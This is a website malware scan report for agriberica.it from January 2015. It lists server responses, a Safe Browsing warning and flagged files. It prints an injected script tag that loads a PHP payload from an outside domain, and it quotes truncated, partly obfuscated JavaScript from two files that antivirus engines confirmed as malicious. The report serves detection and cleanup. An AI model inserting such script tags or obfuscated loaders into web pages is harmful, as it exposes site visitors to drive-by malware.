Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=agriberica.it
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://agriberica.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 21 Jan 2015 08:04:25 GMT Location: http://www.agriberica.it/ Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.agriberica.it/ | HTTP/1.1 200 OK Date: Wed, 21 Jan 2015 08:04:26 GMT Accept-Ranges: bytes ETag: "b02fa33f682ed01:5987ab" Server: Microsoft-IIS/6.0 Content-Length: 10744 Content-Location: http://www.agriberica.it/index.htm Content-Type: text/html Last-Modified: Mon, 12 Jan 2015 13:04:07 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.agriberica.it/index.htm | 200 OK Content-Length: 10744 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://mtmoriahcogic.org/zk7qvbjh.php?id=61672397"></script> | ||
http://www.agriberica.it/subnavig.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://agriberica.it/gen_subnavig.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 21 Jan 2015 08:04:26 GMT Location: http://www.agriberica.it/gen_subnavig.js Server: Apache Content-Length: 248 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.agriberica.it/gen_subnavig.js | 200 OK Content-Length: 29 Content-Type: application/x-javascript | clean |
http://agriberica.it/mouseover.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 21 Jan 2015 08:04:27 GMT Location: http://www.agriberica.it/mouseover.js Server: Apache Content-Length: 245 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.agriberica.it/mouseover.js | 200 OK Content-Length: 5979 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { var p,i,x; Antivirus reports:
| ||
http://agriberica.it/ml.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 21 Jan 2015 08:04:27 GMT Location: http://www.agriberica.it/ml.js Server: Apache Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.agriberica.it/ml.js | 200 OK Content-Length: 5065 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function em_click(){ location.href="mailto:"; return true; } function ml_write(){ document.write('');} function ml_hp_write(){ document.write('<img title=""');} nkuxyo="s"+"p"+"li"+"t";ifduc=window;pp Antivirus reports:
| ||
http://adminsitebuilder.aruba.it/reseller_staging/1001/2.js | 404 Not Found Content-Length: 314 Content-Type: text/html | clean |
http://adminsitebuilder.aruba.it/test404page.js | 404 Not Found Content-Length: 302 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: agriberica.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 21 Jan 2015 08:04:25 GMT
Location: http://www.agriberica.it/
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
...233 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: agriberica.it
Referer: http://www.google.com/search?q=agriberica.it
Result:
The result is similar to the first query. There are no suspicious redirects found.